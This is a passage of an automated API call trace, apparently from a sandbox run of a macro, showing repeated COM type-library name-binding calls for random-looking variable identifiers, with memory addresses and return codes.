pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.477] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.477] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.477] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uGAABXA", lHashVal=0x10f452, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.478] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.478] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.478] IUnknown:Release (This=0x665ba50) returned 0xd [0069.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12f2e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_uGAABXA") returned 15 [0069.478] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uGAABXA", lHashVal=0x10f452, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0069.478] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80dfe | out: _Dst=0x144ec0) returned 0x0 [0069.478] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nAAcXAUA", lHashVal=0x106704, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80e26, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="nAAcXAUA") returned 9 [0069.478] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nAAcXAUA", lHashVal=0x106704, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80e26, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="nAAcXAUA") returned 9 [0069.478] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nAAcXAUA", lHashVal=0x106704, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nAAcXAUA") returned 0x106704 [0069.478] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="nAAcXAUA" | out: _Dst="nAAcXAUA") returned 0x0 [0069.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="nAAcXAUA") returned 9 [0069.478] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.478] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nAAcXAUA", lHashVal=0x106704, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.478] IUnknown:Release (This=0x665ba50) returned 0xd [0069.478] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.478] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nAAcXAUA", lHashVal=0x106704, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.478] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.478] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.479] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nAAcXAUA", lHashVal=0x106704, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.479] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.479] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.479] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nAAcXAUA", lHashVal=0x106704, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.479] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80e26, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="nAAcXAUA") returned 9 [0069.479] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nAAcXAUA", lHashVal=0x106704, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.479] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.479] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80e26 | out: _Dst=0x67c2d40) returned 0x0 [0069.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nAAcXAUA") returned 0x103e8d [0069.479] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_nAAcXAUA" | out: _Dst="_B_var_nAAcXAUA") returned 0x0 [0069.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_nAAcXAUA") returned 16 [0069.479] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.479] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nAAcXAUA", lHashVal=0x103e8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.479] IUnknown:Release (This=0x665ba50) returned 0xd [0069.479] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.479] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nAAcXAUA", lHashVal=0x103e8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.479] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.479] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.479] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nAAcXAUA", lHashVal=0x103e8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.479] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.479] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.479] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nAAcXAUA", lHashVal=0x103e8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.479] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.479] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.479] IUnknown:Release (This=0x665ba50) returned 0xd [0069.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12f5e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_nAAcXAUA") returned 16 [0069.479] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nAAcXAUA", lHashVal=0x103e8d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x58006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x58006300000000, pDummy=0x0) returned 0x0 [0069.480] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80e26 | out: _Dst=0x144ec0) returned 0x0 [0069.480] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XBZcAU1", lHashVal=0x100b6a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80e7e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XBZcAU1") returned 8 [0069.480] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XBZcAU1", lHashVal=0x100b6a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80e7e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XBZcAU1") returned 8 [0069.480] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XBZcAU1", lHashVal=0x100b6a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XBZcAU1") returned 0x100b6a [0069.480] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="XBZcAU1" | out: _Dst="XBZcAU1") returned 0x0 [0069.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="XBZcAU1") returned 8 [0069.480] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.480] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XBZcAU1", lHashVal=0x100b6a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.480] IUnknown:Release (This=0x665ba50) returned 0xd [0069.480] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.480] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XBZcAU1", lHashVal=0x100b6a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.480] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.480] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.480] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XBZcAU1", lHashVal=0x100b6a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.480] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.480] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.480] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XBZcAU1", lHashVal=0x100b6a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.480] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80e7e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XBZcAU1") returned 8 [0069.481] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XBZcAU1", lHashVal=0x100b6a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.481] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.481] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80e7e | out: _Dst=0x67c2d40) returned 0x0 [0069.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XBZcAU1") returned 0x100eee [0069.481] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_XBZcAU1" | out: _Dst="_B_var_XBZcAU1") returned 0x0 [0069.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_XBZcAU1") returned 15 [0069.481] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.481] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XBZcAU1", lHashVal=0x100eee, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.481] IUnknown:Release (This=0x665ba50) returned 0xd [0069.481] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.481] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XBZcAU1", lHashVal=0x100eee, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.481] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.481] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.481] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XBZcAU1", lHashVal=0x100eee, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.481] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.481] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.481] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XBZcAU1", lHashVal=0x100eee, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.481] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.481] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.481] IUnknown:Release (This=0x665ba50) returned 0xd [0069.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12f8e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_XBZcAU1") returned 15 [0069.481] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XBZcAU1", lHashVal=0x100eee, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0069.481] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80e7e | out: _Dst=0x144ec0) returned 0x0 [0069.482] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UAcAxQxc", lHashVal=0x10bbad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80e52, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="UAcAxQxc") returned 9 [0069.482] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UAcAxQxc", lHashVal=0x10bbad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80e52, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="UAcAxQxc") returned 9 [0069.482] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UAcAxQxc", lHashVal=0x10bbad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.482] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UAcAxQxc") returned 0x10bbad [0069.482] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="UAcAxQxc" | out: _Dst="UAcAxQxc") returned 0x0 [0069.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="UAcAxQxc") returned 9 [0069.482] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.482] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="UAcAxQxc", lHashVal=0x10bbad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.482] IUnknown:Release (This=0x665ba50) returned 0xd [0069.482] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.482] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="UAcAxQxc", lHashVal=0x10bbad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.482] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.482] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.482] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="UAcAxQxc", lHashVal=0x10bbad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.482] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.482] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.482] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="UAcAxQxc", lHashVal=0x10bbad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.482] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80e52, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="UAcAxQxc") returned 9 [0069.482] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UAcAxQxc", lHashVal=0x10bbad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.483] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.483] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80e52 | out: _Dst=0x67c2d40) returned 0x0 [0069.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_UAcAxQxc") returned 0x109336 [0069.483] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_UAcAxQxc" | out: _Dst="_B_var_UAcAxQxc") returned 0x0 [0069.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_UAcAxQxc") returned 16 [0069.483] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.483] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_UAcAxQxc", lHashVal=0x109336, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.483] IUnknown:Release (This=0x665ba50) returned 0xd [0069.483] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.483] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_UAcAxQxc", lHashVal=0x109336, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.483] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.483] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.483] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_UAcAxQxc", lHashVal=0x109336, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.483] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.483] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.483] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_UAcAxQxc", lHashVal=0x109336, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.483] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.483] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.483] IUnknown:Release (This=0x665ba50) returned 0xd [0069.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12fbe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_UAcAxQxc") returned 16 [0069.483] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UAcAxQxc", lHashVal=0x109336, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0) returned 0x0 [0069.483] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80e52 | out: _Dst=0x144ec0) returned 0x0 [0069.483] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aUAxBCGA", lHashVal=0x104e04, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ece, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aUAxBCGA") returned 9 [0069.484] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aUAxBCGA", lHashVal=0x104e04, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ece, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aUAxBCGA") returned 9 [0069.484] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aUAxBCGA", lHashVal=0x104e04, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.484] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aUAxBCGA") returned 0x104e04 [0069.484] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="aUAxBCGA" | out: _Dst="aUAxBCGA") returned 0x0 [0069.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="aUAxBCGA") returned 9 [0069.484] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.484] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aUAxBCGA", lHashVal=0x104e04, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.484] IUnknown:Release (This=0x665ba50) returned 0xd [0069.484] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.484] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aUAxBCGA", lHashVal=0x104e04, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.484] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.484] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.484] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aUAxBCGA", lHashVal=0x104e04, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.484] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.484] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.484] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aUAxBCGA", lHashVal=0x104e04, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.484] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ece, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aUAxBCGA") returned 9 [0069.484] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aUAxBCGA", lHashVal=0x104e04, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, 